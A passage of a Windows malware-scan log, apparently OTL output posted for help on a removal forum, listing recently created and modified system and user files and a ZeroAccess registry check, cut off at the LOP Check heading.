[2014-10-15 10:27:44 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll [2014-10-15 10:27:44 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll [2014-10-15 10:27:44 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll [2014-10-15 10:27:44 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll [2014-10-15 10:27:44 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll [2014-10-15 10:27:43 | 002,017,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl [2014-10-15 10:27:43 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll [2014-10-15 10:27:42 | 000,731,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll [2014-10-15 10:27:42 | 000,446,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll [2014-10-15 10:27:42 | 000,440,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll [2014-10-15 10:27:42 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe [2014-10-15 10:27:42 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll [2014-10-15 10:27:42 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll [2014-10-15 10:27:41 | 002,108,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl [2014-10-15 10:27:41 | 001,068,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll [2014-10-15 10:27:41 | 000,678,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll [2014-10-15 10:27:41 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe [2014-10-15 10:27:40 | 000,595,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll [2014-10-15 10:27:40 | 000,289,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll [2014-10-15 10:27:40 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll [2014-10-15 10:27:40 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll [2014-10-15 10:27:39 | 005,829,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll [2014-10-15 10:27:39 | 001,249,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll [2014-10-15 10:27:39 | 000,775,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll [2014-10-15 10:27:39 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll [2014-10-15 10:27:39 | 000,547,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll [2014-10-15 10:27:39 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe [2014-10-15 10:27:39 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll [2014-10-15 10:27:38 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe [2014-10-15 10:27:38 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll [2014-10-15 10:27:38 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll [2014-10-15 10:17:17 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\packager.dll [2014-10-15 10:17:17 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\packager.dll [2014-10-15 10:12:35 | 000,842,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\blackbox.dll [2014-10-15 10:12:35 | 000,744,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\blackbox.dll [2014-10-15 10:12:34 | 001,202,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmv2clt.dll [2014-10-15 10:12:32 | 000,988,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmv2clt.dll [2014-10-15 10:12:30 | 014,632,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmp.dll [2014-10-15 10:12:29 | 011,411,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmp.dll [2014-10-15 10:12:29 | 004,120,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mf.dll [2014-10-15 10:12:29 | 000,782,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmdrmsdk.dll [2014-10-15 10:12:29 | 000,617,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmdrmsdk.dll [2014-10-15 10:12:29 | 000,500,224 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AUDIOKSE.dll [2014-10-15 10:12:28 | 003,208,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mf.dll [2014-10-15 10:12:28 | 001,574,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\quartz.dll [2014-10-15 10:12:28 | 000,693,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.efi [2014-10-15 10:12:28 | 000,619,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.exe [2014-10-15 10:12:28 | 000,616,352 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.efi [2014-10-15 10:12:28 | 000,497,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmmgrtn.dll [2014-10-15 10:12:28 | 000,457,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ci.dll [2014-10-15 10:12:28 | 000,442,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\AUDIOKSE.dll [2014-10-15 10:12:28 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioEng.dll [2014-10-15 10:12:28 | 000,406,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmmgrtn.dll [2014-10-15 10:12:27 | 005,551,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe [2014-10-15 10:12:27 | 003,970,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe [2014-10-15 10:12:27 | 003,914,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe [2014-10-15 10:12:27 | 001,480,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll [2014-10-15 10:12:27 | 001,069,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptui.dll [2014-10-15 10:12:27 | 000,631,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\evr.dll [2014-10-15 10:12:27 | 000,532,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.exe [2014-10-15 10:12:27 | 000,296,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioSes.dll [2014-10-15 10:12:27 | 000,284,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\EncDump.dll [2014-10-15 10:12:27 | 000,229,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll [2014-10-15 10:12:26 | 001,329,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\quartz.dll [2014-10-15 10:12:26 | 001,005,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cryptui.dll [2014-10-15 10:12:26 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll [2014-10-15 10:12:26 | 000,489,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\evr.dll [2014-10-15 10:12:26 | 000,432,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfplat.dll [2014-10-15 10:12:26 | 000,354,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfplat.dll [2014-10-15 10:12:26 | 000,082,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptsp.dll [2014-10-15 10:12:25 | 000,641,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msscp.dll [2014-10-15 10:12:25 | 000,504,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msscp.dll [2014-10-15 10:12:25 | 000,325,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msnetobj.dll [2014-10-15 10:12:25 | 000,296,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rstrui.exe [2014-10-15 10:12:25 | 000,265,216 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msnetobj.dll [2014-10-15 10:12:25 | 000,206,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfps.dll [2014-10-15 10:12:25 | 000,126,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\audiodg.exe [2014-10-15 10:12:25 | 000,103,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfps.dll [2014-10-15 10:12:25 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidapi.dll [2014-10-15 10:12:25 | 000,055,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rrinstaller.exe [2014-10-15 10:12:25 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rrinstaller.exe [2014-10-15 10:12:24 | 000,146,944 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidpolicyconverter.exe [2014-10-15 10:12:24 | 000,050,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\appidapi.dll [2014-10-15 10:12:24 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfpmp.exe [2014-10-15 10:12:23 | 000,063,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\setbcdlocale.dll [2014-10-15 10:12:23 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srclient.dll [2014-10-15 10:12:23 | 000,023,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfpmp.exe [2014-10-15 10:12:23 | 000,017,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidcertstorecheck.exe [2014-10-15 10:12:19 | 000,009,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\spwmp.dll [2014-10-15 10:12:18 | 000,008,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\spwmp.dll [2014-10-15 10:12:18 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msdxm.ocx [2014-10-15 10:12:18 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxmasf.dll [2014-10-15 10:12:17 | 012,625,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmploc.DLL [2014-10-15 10:12:17 | 012,625,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmploc.DLL [2014-10-15 10:12:17 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msdxm.ocx [2014-10-15 10:12:17 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dxmasf.dll [2014-10-15 10:12:17 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mferror.dll [2014-10-15 10:12:17 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mferror.dll [2014-10-15 10:07:33 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rastls.dll [2014-10-15 10:07:33 | 000,372,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rastls.dll [2014-10-15 10:07:24 | 003,221,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstscax.dll [2014-10-15 10:07:23 | 003,722,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstscax.dll [2014-10-15 10:07:23 | 001,118,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstsc.exe [2014-10-15 10:07:21 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstsc.exe [2014-10-15 10:07:21 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe [2014-10-15 10:07:21 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsta.dll [2014-10-15 10:07:21 | 000,150,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpcorekmts.dll [2014-10-15 10:07:21 | 000,131,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\aaclient.dll [2014-10-15 10:07:11 | 003,241,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msi.dll [2014-10-14 12:38:36 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\LG Electronics [2014-10-08 22:14:08 | 000,122,584 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys [2014-10-08 22:13:56 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware [2014-10-08 22:13:54 | 000,091,352 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys [2014-10-08 22:13:54 | 000,063,704 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mwac.sys [2014-10-08 22:13:54 | 000,025,816 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys [2014-10-08 22:13:54 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes Anti-Malware [2014-10-08 22:13:54 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes [2014-10-07 21:03:48 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Roaming\Thinstall [2014-10-06 15:27:15 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\27683 [2014-10-04 23:24:04 | 000,000,000 | ---D | C] -- C:\Users\Admin\Documents\FIFA 15 Demo [2014-10-04 23:22:56 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FIFA 15 Demo [2014-10-04 23:22:10 | 000,000,000 | ---D | C] -- C:\ProgramData\Package Cache [2014-10-04 22:43:32 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Origin Games [2014-10-04 22:42:28 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Roaming\Origin [2014-10-04 22:42:26 | 000,000,000 | ---D | C] -- C:\Users\Admin\AppData\Local\Origin [2014-10-04 22:40:30 | 000,000,000 | ---D | C] -- C:\ProgramData\Electronic Arts [2014-10-04 22:40:28 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Origin [2014-10-04 20:42:19 | 000,000,000 | ---D | C] -- C:\Users\Admin\Desktop\agh [2014-10-01 14:15:31 | 000,519,680 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\qdvd.dll [2014-10-01 14:15:31 | 000,371,712 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\qdvd.dll [185 C:\*.tmp files -> C:\*.tmp -> ] [color=#E56717]========== Files - Modified Within 30 Days ==========[/color] [2014-10-30 21:47:40 | 000,032,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 [2014-10-30 21:47:40 | 000,032,080 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 [2014-10-30 21:45:45 | 000,000,168 | ---- | M] () -- C:\Users\Admin\defogger_reenable [2014-10-30 21:34:32 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat [2014-10-30 21:18:49 | 000,000,930 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job [2014-10-30 20:12:40 | 3144,433,664 | -HS- | M] () -- C:\hiberfil.sys [2014-10-30 10:40:01 | 000,000,928 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3933479072-2540534226-446759770-1000UA.job [2014-10-30 10:29:38 | 001,670,518 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI [2014-10-30 10:29:38 | 000,740,672 | ---- | M] () -- C:\Windows\SysNative\perfh015.dat [2014-10-30 10:29:38 | 000,654,464 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat [2014-10-30 10:29:38 | 000,156,214 | ---- | M] () -- C:\Windows\SysNative\perfc015.dat [2014-10-30 10:29:38 | 000,122,336 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat [2014-10-29 23:29:58 | 000,122,584 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys [2014-10-29 22:40:01 | 000,000,906 | ---- | M] () -- C:\Windows\tasks\FacebookUpdateTaskUserS-1-5-21-3933479072-2540534226-446759770-1000Core.job [2014-10-29 08:54:48 | 000,518,896 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT [2014-10-29 00:46:17 | 000,002,034 | ---- | M] () -- C:\Users\Public\Desktop\AutoCAD 2011 - Polski.lnk [2014-10-29 00:31:47 | 000,065,529 | ---- | M] () -- C:\Users\Admin\Desktop\10748736_375681895926629_482733521_n.jpg [2014-10-29 00:10:43 | 000,138,063 | ---- | M] () -- C:\Users\Admin\Desktop\10743640_375683035926515_1986732886_n.jpg [2014-10-29 00:09:26 | 000,039,008 | ---- | M] () -- C:\Users\Admin\Desktop\10711184_375682189259933_964436193_n.jpg [2014-10-28 12:41:29 | 000,001,770 | ---- | M] () -- C:\Users\Public\Desktop\Free DWG Viewer.lnk [2014-10-28 01:15:46 | 000,148,696 | ---- | M] () -- C:\Users\Admin\Desktop\Django.Unchained.2012.DVDSCR.X264.AAC-P2P.srt [2014-10-28 01:15:45 | 000,058,536 | ---- | M] () -- C:\Users\Admin\Desktop\django-unchained-eng-4770000.zip [2014-10-28 01:14:31 | 000,001,432 | RHS- | M] () -- C:\ProgramData\ntuser.pol [2014-10-27 21:34:35 | 000,001,020 | ---- | M] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dtella.lnk [2014-10-26 15:12:13 | 009,029,514 | ---- | M] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Zajebały żule mi_ (Konewka _ Indila - Dernière Danse _ Parody_) [ ChwytakTV ].mp3 [2014-10-26 15:11:12 | 010,048,650 | ---- | M] () -- C:\Users\Admin\Documents\Imagine Dragons __ Radioactive (official extended version without Kendrick Lamar).mp3 [2014-10-26 15:10:42 | 006,994,495 | ---- | M] () -- C:\Users\Admin\Documents\Imagine Dragons __ Radioactive (official extended version without Kendrick Lamar).mp4 [2014-10-26 15:10:37 | 144,550,769 | ---- | M] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Zajebały żule mi_ (Konewka _ Indila - Dernière Danse _ Parody_) [ ChwytakTV ].mp4 [2014-10-26 15:07:54 | 008,084,874 | ---- | M] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Stolec Dance_ (Tyś je pojebany) Stolen Dance _ Parody _) [ ChwytakTV ](mp3).mp3 [2014-10-26 15:06:21 | 008,084,874 | ---- | M] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Stolec Dance_ (Tyś je pojebany) Stolen Dance _ Parody _) [ ChwytakTV ].mp3 [2014-10-26 15:03:46 | 118,505,533 | ---- | M] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Stolec Dance_ (Tyś je pojebany) Stolen Dance _ Parody _) [ ChwytakTV ].mp4 [2014-10-24 19:39:38 | 000,000,954 | ---- | M] () -- C:\Users\Public\Desktop\GIMP 2.lnk [2014-10-24 19:39:28 | 001,138,462 | ---- | M] () -- C:\Users\Admin\Desktop\Nowy obraz mapy bitowej.bmp [2014-10-24 19:39:28 | 000,000,857 | ---- | M] () -- C:\Users\Admin\.recently-used.xbel [2014-10-17 17:55:11 | 000,036,936 | ---- | M] () -- C:\Users\Admin\Desktop\1536682_778884205488921_8344246065606850257_n.jpg [2014-10-15 09:55:07 | 419,492,238 | ---- | M] () -- C:\Windows\MEMORY.DMP [2014-10-13 17:51:14 | 002,790,829 | ---- | M] () -- C:\Users\Admin\Desktop\0_1_47243_Wyjatkowo_popieprzona_animacja_przez_alfred77.gif [2014-10-10 08:25:04 | 029,791,435 | ---- | M] () -- C:\Users\Admin\Desktop\Resnick,_Halliday_-_Podstawy_Fizyki_1.7z [2014-10-10 03:05:59 | 000,276,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll [2014-10-10 03:05:42 | 000,507,392 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll [2014-10-10 03:00:38 | 000,424,448 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll [2014-10-08 22:13:56 | 000,001,102 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk [2014-10-06 07:25:14 | 000,246,784 | ---- | M] () -- C:\Windows\SysWow64\hfpapi.dll [2014-10-04 23:22:56 | 000,001,209 | ---- | M] () -- C:\Users\Public\Desktop\FIFA 15 Demo.lnk [185 C:\*.tmp files -> C:\*.tmp -> ] [color=#E56717]========== Files Created - No Company Name ==========[/color] [2014-10-30 21:45:45 | 000,000,168 | ---- | C] () -- C:\Users\Admin\defogger_reenable [2014-10-29 00:46:17 | 000,002,034 | ---- | C] () -- C:\Users\Public\Desktop\AutoCAD 2011 - Polski.lnk [2014-10-29 00:10:23 | 000,138,063 | ---- | C] () -- C:\Users\Admin\Desktop\10743640_375683035926515_1986732886_n.jpg [2014-10-29 00:09:25 | 000,039,008 | ---- | C] () -- C:\Users\Admin\Desktop\10711184_375682189259933_964436193_n.jpg [2014-10-29 00:08:40 | 000,065,529 | ---- | C] () -- C:\Users\Admin\Desktop\10748736_375681895926629_482733521_n.jpg [2014-10-28 12:41:29 | 000,001,770 | ---- | C] () -- C:\Users\Public\Desktop\Free DWG Viewer.lnk [2014-10-28 01:16:25 | 000,148,696 | ---- | C] () -- C:\Users\Admin\Desktop\Django.Unchained.2012.DVDSCR.X264.AAC-P2P.srt [2014-10-28 01:15:44 | 000,058,536 | ---- | C] () -- C:\Users\Admin\Desktop\django-unchained-eng-4770000.zip [2014-10-27 21:34:35 | 000,001,020 | ---- | C] () -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dtella.lnk [2014-10-26 15:12:02 | 009,029,514 | ---- | C] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Zajebały żule mi_ (Konewka _ Indila - Dernière Danse _ Parody_) [ ChwytakTV ].mp3 [2014-10-26 15:10:58 | 010,048,650 | ---- | C] () -- C:\Users\Admin\Documents\Imagine Dragons __ Radioactive (official extended version without Kendrick Lamar).mp3 [2014-10-26 15:10:42 | 006,994,495 | ---- | C] () -- C:\Users\Admin\Documents\Imagine Dragons __ Radioactive (official extended version without Kendrick Lamar).mp4 [2014-10-26 15:10:36 | 144,550,769 | ---- | C] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Zajebały żule mi_ (Konewka _ Indila - Dernière Danse _ Parody_) [ ChwytakTV ].mp4 [2014-10-26 15:07:42 | 008,084,874 | ---- | C] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Stolec Dance_ (Tyś je pojebany) Stolen Dance _ Parody _) [ ChwytakTV ](mp3).mp3 [2014-10-26 15:06:10 | 008,084,874 | ---- | C] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Stolec Dance_ (Tyś je pojebany) Stolen Dance _ Parody _) [ ChwytakTV ].mp3 [2014-10-26 15:03:46 | 118,505,533 | ---- | C] () -- C:\Users\Admin\Documents\Chwytak & Dj Wiktor - _Stolec Dance_ (Tyś je pojebany) Stolen Dance _ Parody _) [ ChwytakTV ].mp4 [2014-10-24 19:39:28 | 000,000,857 | ---- | C] () -- C:\Users\Admin\.recently-used.xbel [2014-10-24 19:31:21 | 000,000,954 | ---- | C] () -- C:\Users\Public\Desktop\GIMP 2.lnk [2014-10-17 17:55:09 | 000,036,936 | ---- | C] () -- C:\Users\Admin\Desktop\1536682_778884205488921_8344246065606850257_n.jpg [2014-10-13 17:51:13 | 002,790,829 | ---- | C] () -- C:\Users\Admin\Desktop\0_1_47243_Wyjatkowo_popieprzona_animacja_przez_alfred77.gif [2014-10-10 08:24:52 | 029,791,435 | ---- | C] () -- C:\Users\Admin\Desktop\Resnick,_Halliday_-_Podstawy_Fizyki_1.7z [2014-10-10 08:24:00 | 036,320,562 | ---- | C] () -- C:\Users\Admin\Desktop\Resnick,_Halliday_-_Podstawy_Fizyki_1.pdf [2014-10-08 22:13:56 | 000,001,102 | ---- | C] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk [2014-10-06 07:25:14 | 000,246,784 | ---- | C] () -- C:\Windows\SysWow64\hfpapi.dll [2014-10-05 22:56:39 | 001,138,462 | ---- | C] () -- C:\Users\Admin\Desktop\Nowy obraz mapy bitowej.bmp [2014-10-04 23:22:56 | 000,001,209 | ---- | C] () -- C:\Users\Public\Desktop\FIFA 15 Demo.lnk [2014-03-15 22:42:07 | 000,001,432 | RHS- | C] () -- C:\ProgramData\ntuser.pol [2014-02-08 11:56:08 | 000,000,892 | RHS- | C] () -- C:\Users\Admin\ntuser.pol [2013-12-19 00:27:02 | 000,000,100 | ---- | C] () -- C:\Users\Admin\AppData\Roaming\WB.CFG [2013-10-21 19:06:28 | 000,020,480 | ---- | C] () -- C:\Windows\Base64.dll [2013-10-14 03:53:57 | 000,114,176 | ---- | C] () -- C:\Windows\clfct.dll [2013-09-13 20:42:29 | 001,643,124 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI [2013-09-10 18:05:31 | 013,020,160 | ---- | C] () -- C:\Windows\SysWow64\ig7icd32.dll [2013-09-10 18:05:31 | 000,735,796 | ---- | C] () -- C:\Windows\SysWow64\igkrng700.bin [2013-09-10 18:05:31 | 000,561,508 | ---- | C] () -- C:\Windows\SysWow64\igfcg700m.bin [2013-09-10 18:05:31 | 000,058,880 | ---- | C] () -- C:\Windows\SysWow64\igdde32.dll [2013-08-28 23:03:36 | 000,054,272 | ---- | C] () -- C:\Windows\sassr.dat [2013-08-20 13:29:23 | 000,061,952 | -H-- | C] () -- C:\Windows\SysWow64\sinvfct.dll [2013-07-18 17:40:42 | 000,110,080 | ---- | C] () -- C:\Windows\sysk32.dll [2013-07-18 17:40:37 | 000,051,712 | ---- | C] () -- C:\Windows\jimglib.dll [color=#E56717]========== ZeroAccess Check ==========[/color] [2009-07-14 05:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64 [HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64 "" = C:\Windows\SysNative\shell32.dll -- [2014-06-25 03:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2014-06-25 02:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009-07-14 02:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2010-11-21 04:24:25 | 000,606,208 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64 "" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009-07-14 02:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] [color=#E56717]========== LOP Check 